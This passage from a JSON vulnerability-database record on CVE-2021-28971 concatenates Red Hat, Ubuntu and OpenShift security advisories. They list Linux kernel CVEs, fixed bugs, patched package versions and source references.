with RFC1042\nheader (CVE-2020-26144)\n* kernel: accepting plaintext broadcast fragments as full frames\n(CVE-2020-26145)\n* kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n(CVE-2020-27777)\n* kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a\nread-after-free (CVE-2020-29660)\n* kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a\nlong SSID value (CVE-2020-36158)\n* kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt()\n(CVE-2020-36386)\n* kernel: Improper access control in BlueZ may allow information disclosure\nvulnerability. (CVE-2021-0129)\n* kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n(CVE-2021-3348)\n* kernel: Linux kernel eBPF RINGBUF map oversized allocation\n(CVE-2021-3489)\n* kernel: double free in bluetooth subsystem when the HCI device\ninitialization fails (CVE-2021-3564)\n* kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573)\n* kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600)\n* kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679)\n* kernel: Mounting overlayfs inside an unprivileged user namespace can\nreveal files (CVE-2021-3732)\n* kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n(CVE-2021-20194)\n* kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133)\n* kernel: fuse: stall on CPU can occur because a retry loop continually\nfinds the same bad inode (CVE-2021-28950)\n* kernel: System crash in intel_pmu_drain_pebs_nhm in\narch/x86/events/intel/ds.c (CVE-2021-28971)\n* kernel: protection can be bypassed to leak content of kernel memory\n(CVE-2021-29155)\n* kernel: improper input validation in tipc_nl_retrieve_key function in\nnet/tipc/node.c (CVE-2021-29646)\n* kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650)\n* kernel: local escalation of privileges in handling of eBPF programs\n(CVE-2021-31440)\n* kernel: protection of stack pointer against speculative pointer\narithmetic can be bypassed to leak content of kernel memory\n(CVE-2021-31829)\n* kernel: out-of-bounds reads and writes due to enforcing incorrect limits\nfor pointer arithmetic operations by BPF verifier (CVE-2021-33200)\n* kernel: reassembling encrypted fragments with non-consecutive packet\nnumbers (CVE-2020-26146)\n* kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147)\n* kernel: the copy-on-write implementation can grant unintended write\naccess because of a race condition in a THP mapcount check (CVE-2020-29368)\n* kernel: flowtable list del corruption with kernel BUG at\nlib/list_debug.c:50 (CVE-2021-3635)\n* kernel: NULL pointer dereference in llsec_key_alloc() in\nnet/mac802154/llsec.c (CVE-2021-3659)\n* kernel: setsockopt System Call Untrusted Pointer Dereference Information\nDisclosure (CVE-2021-20239)\n* kernel: out of bounds array access in drivers/md/dm-ioctl.c\n(CVE-2021-31916)\n\n4. Solution:\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.5 Release Notes linked from the References section. \n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1509204 - dlm: Add ability to set SO_MARK on DLM sockets\n1793880 - Unreliable RTC synchronization (11-minute mode)\n1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10\n1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check\n1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free\n1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value\n1915825 - Allow falling back to genfscon labeling when the FS doesn\u0027t support xattrs and there is a fs_use_xattr rule for it\n1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. \n1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure\n1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers\n1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers\n1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers\n1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with \u0027serverino\u0027 and \u0027cache=strict \u0027\n1939341 - CNB: net: add inline function skb_csum_is_sctp\n1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode\n1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c\n1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c\n1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS\n1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c\n1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del\n1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory\n1953847 - [ethtool] The `NLM_F_MULTI` should be used for `NLM_F_DUMP`\n1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. \n1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory\n1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation\n1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection\n1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys\n1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame\n1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client\n1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks\n1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames\n1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks\n1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header\n1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames\n1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers\n1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments\n1960708 - please add CAP_CHECKPOINT_RESTORE to capability.h\n1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs\n1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails\n1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. \n1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls\n1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier\n1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl()\n1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c\n1971101 - ceph: potential data corruption in cephfs write_begin codepath\n1972278 - libceph: allow addrvecs with a single NONE/blank address\n1974627 - [TIPC] kernel BUG at lib/list_debug.c:31!\n1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0]\n1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c\n1976679 - blk-mq: fix/improve io scheduler batching dispatch\n1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00\n1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50\n1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116)\n1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame\n1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel\n1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level\n1977850 - geneve virtual devices lack  the NETIF_F_FRAGLIST feature\n1978369 - dm writecache: sync with upstream 5.14\n1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?)\n1979680 - Backport openvswitch tracepoints\n1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod\n1986138 - Lockd invalid cast to nlm_lockowner\n1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty()\n1989999 - ceph omnibus backport for RHEL-8.5.0\n1991976 - block: fix New warning in nvme_setup_discard\n1992700 - blk-mq: fix kernel panic when iterating over flush request\n1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files\n1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\nkernel-4.18.0-348.el8.src.rpm\n\naarch64:\nbpftool-4.18.0-348.el8.aarch64.rpm\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-4.18.0-348.el8.aarch64.rpm\nkernel-core-4.18.0-348.el8.aarch64.rpm\nkernel-cross-headers-4.18.0-348.el8.aarch64.rpm\nkernel-debug-4.18.0-348.el8.aarch64.rpm\nkernel-debug-core-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-devel-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-devel-4.18.0-348.el8.aarch64.rpm\nkernel-headers-4.18.0-348.el8.aarch64.rpm\nkernel-modules-4.18.0-348.el8.aarch64.rpm\nkernel-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-tools-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-4.18.0-348.el8.aarch64.rpm\nperf-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nnoarch:\nkernel-abi-stablelists-4.18.0-348.el8.noarch.rpm\nkernel-doc-4.18.0-348.el8.noarch.rpm\n\nppc64le:\nbpftool-4.18.0-348.el8.ppc64le.rpm\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-4.18.0-348.el8.ppc64le.rpm\nkernel-core-4.18.0-348.el8.ppc64le.rpm\nkernel-cross-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-core-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-modules-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-4.18.0-348.el8.ppc64le.rpm\nperf-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\ns390x:\nbpftool-4.18.0-348.el8.s390x.rpm\nbpftool-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-4.18.0-348.el8.s390x.rpm\nkernel-core-4.18.0-348.el8.s390x.rpm\nkernel-cross-headers-4.18.0-348.el8.s390x.rpm\nkernel-debug-4.18.0-348.el8.s390x.rpm\nkernel-debug-core-4.18.0-348.el8.s390x.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-debug-devel-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm\nkernel-devel-4.18.0-348.el8.s390x.rpm\nkernel-headers-4.18.0-348.el8.s390x.rpm\nkernel-modules-4.18.0-348.el8.s390x.rpm\nkernel-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-tools-4.18.0-348.el8.s390x.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm\nperf-4.18.0-348.el8.s390x.rpm\nperf-debuginfo-4.18.0-348.el8.s390x.rpm\npython3-perf-4.18.0-348.el8.s390x.rpm\npython3-perf-debuginfo-4.18.0-348.el8.s390x.rpm\n\nx86_64:\nbpftool-4.18.0-348.el8.x86_64.rpm\nbpftool-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-4.18.0-348.el8.x86_64.rpm\nkernel-core-4.18.0-348.el8.x86_64.rpm\nkernel-cross-headers-4.18.0-348.el8.x86_64.rpm\nkernel-debug-4.18.0-348.el8.x86_64.rpm\nkernel-debug-core-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-devel-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-devel-4.18.0-348.el8.x86_64.rpm\nkernel-headers-4.18.0-348.el8.x86_64.rpm\nkernel-modules-4.18.0-348.el8.x86_64.rpm\nkernel-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-tools-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-4.18.0-348.el8.x86_64.rpm\nperf-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nRed Hat Enterprise Linux CRB (v. 8):\n\naarch64:\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nppc64le:\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST\nFrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l\nbobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy\nSfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW\nHgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC\nDRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E\nlJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD\nJhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK\ndQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8\nzf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v\n1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN\n+PuV5cms0sE=2UUA\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. ==========================================================================\nUbuntu Security Notice USN-4948-1\nMay 11, 2021\n\nlinux-oem-5.10 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-oem-5.10: Linux kernel for OEM systems\n\nDetails:\n\nRyota Shiga discovered that the eBPF implementation in the Linux kernel did\nnot properly verify that a BPF program only reserved as much memory for a\nring buffer as was allocated. A local attacker could use this to cause a\ndenial of service (system crash) or execute arbitrary code. (CVE-2021-3489)\n\nManfred Paul discovered that the eBPF implementation in the Linux kernel\ndid not properly track bounds on bitwise operations. A local attacker could\nuse this to cause a denial of service (system crash) or execute arbitrary\ncode. (CVE-2021-3490)\n\nBilly Jheng Bing-Jhong discovered that the io_uring implementation of the\nLinux kernel did not properly enforce the MAX_RW_COUNT limit in some\nsituations. A local attacker could use this to cause a denial of service\n(system crash) or execute arbitrary code. (CVE-2021-3491)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel contained a reference counting error. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2020-25670)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel did not properly deallocate memory in certain error\nsituations. A local attacker could use this to cause a denial of service\n(memory exhaustion). (CVE-2020-25671, CVE-2020-25672)\n\nIt was discovered that the Xen paravirtualization backend in the Linux\nkernel did not properly deallocate memory in some situations. A local\nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2021-28688)\n\nIt was discovered that the io_uring subsystem in the Linux kernel contained\na race condition leading to a deadlock condition. A local attacker could\nuse this to cause a denial of service. (CVE-2021-28951)\n\nJohn Stultz discovered that the audio driver for Qualcomm SDM845 systems in\nthe Linux kernel did not properly validate port ID numbers. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2021-28952)\n\nZygo Blaxell discovered that the btrfs file system implementation in the\nLinux kernel contained a race condition during certain cloning operations. \nA local attacker could possibly use this to cause a denial of service\n(system crash). (CVE-2021-28964)\n\nVince Weaver discovered that the perf subsystem in the Linux kernel did\nnot properly handle certain PEBS records properly for some Intel Haswell\nprocessors. A local attacker could use this cause a denial of service\n(system crash). (CVE-2021-28971)\n\nIt was discovered that the RPA PCI Hotplug driver implementation in the\nLinux kernel did not properly handle device name writes via sysfs, leading\nto a buffer overflow. A privileged attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2021-28972)\n\nIt was discovered that the Freescale Gianfar Ethernet driver for the Linux\nkernel did not properly handle receive queue overrun when jumbo frames were\nenabled in some situations. An attacker could use this to cause a denial of\nservice (system crash). An attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2021-29266)\n\nIt was discovered that the TIPC protocol implementation in the Linux kernel\ndid not properly validate passed encryption key sizes. A local attacker\ncould use this to cause a denial of service (system crash). \n(CVE-2021-29646)\n\nIt was discovered that the Qualcomm IPC router implementation in the Linux\nkernel did not properly initialize memory passed to user space. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2021-29647)\n\nIt was discovered that the BPF user mode driver implementation in the Linux\nkernel did not properly deallocate memory in some situations. A local\nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2021-29649)\n\nIt was discovered that a race condition existed in the netfilter subsystem\nof the Linux kernel when replacing tables. A local attacker could use this\nto cause a denial of service (system crash). (CVE-2021-29650)\n\nFelix Wilhelm discovered that the KVM implementation in the Linux kernel\nfor AMD processors contained race conditions on nested VMCB controls. A\nlocal attacker in a guest vm could possibly use this to gain elevated\nprivileges. (CVE-2021-29657)\n\nDan Carpenter discovered that the block device manager (dm) implementation\nin the Linux kernel contained a buffer overflow in the ioctl for listing\ndevices. A privileged local attacker could use this to cause a denial of\nservice (system crash). (CVE-2021-31916)\n\n\u9a6c\u54f2\u5b87 discovered that the IEEE 1394 (Firewire) nosy packet sniffer\ndriver in the Linux kernel did not properly perform reference counting in\nsome situations, leading to a use-after-free vulnerability. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2021-3483)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n  linux-image-5.10.0-1026-oem     5.10.0-1026.27\n  linux-image-oem-20.04b          5.10.0.1026.27\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-4948-1\n  CVE-2020-25670, CVE-2020-25671, CVE-2020-25672, CVE-2021-28688,\n  CVE-2021-28951, CVE-2021-28952, CVE-2021-28964, CVE-2021-28971,\n  CVE-2021-28972, CVE-2021-29264, CVE-2021-29266, CVE-2021-29646,\n  CVE-2021-29647, CVE-2021-29649, CVE-2021-29650, CVE-2021-29657,\n  CVE-2021-31916, CVE-2021-3483, CVE-2021-3489, CVE-2021-3490,\n  CVE-2021-3491\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1026.27\n. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1168 - Disable hostname verification in syslog TLS settings\nLOG-1235 - Using HTTPS without a secret does not translate into the correct \u0027scheme\u0027 value in Fluentd\nLOG-1375 - ssl_ca_cert should be optional\nLOG-1378 - CLO should support sasl_plaintext(Password over http)\nLOG-1392 - In fluentd config, flush_interval can\u0027t be set with flush_mode=immediate\nLOG-1494 - Syslog output is serializing json incorrectly\nLOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server\nLOG-1575 - Rejected by Elasticsearch and unexpected json-parsing\nLOG-1735 - Regression introducing flush_at_shutdown \nLOG-1774 - The collector logs should  be excluded in fluent.conf\nLOG-1776 - fluentd total_limit_size sets value beyond available space\nLOG-1822 - OpenShift Alerting Rules Style-Guide Compliance\nLOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled\nLOG-1862 - Unsupported kafka parameters when enabled Kafka SASL\nLOG-1903 - Fix the Display of ClusterLogging type in OLM\nLOG-1911 - CLF API changes to Opt-in to multiline error detection\nLOG-1918 - Alert `FluentdNodeDown` always firing \nLOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding\n\n6",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28971"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010252"
      },
      {
        "db": "VULHUB",
        "id": "VHN-388497"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28971"
      },
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-28971",
        "trust": 4.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162939",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162981",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "164875",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162549",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010252",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1258",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.4254",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1919",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2217",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1307",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1964",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1625",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1655",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1299",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2136",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1694",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3825",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1946",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1231",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3905",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "162969",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "164837",
        "trust": 0.2
      },
      {
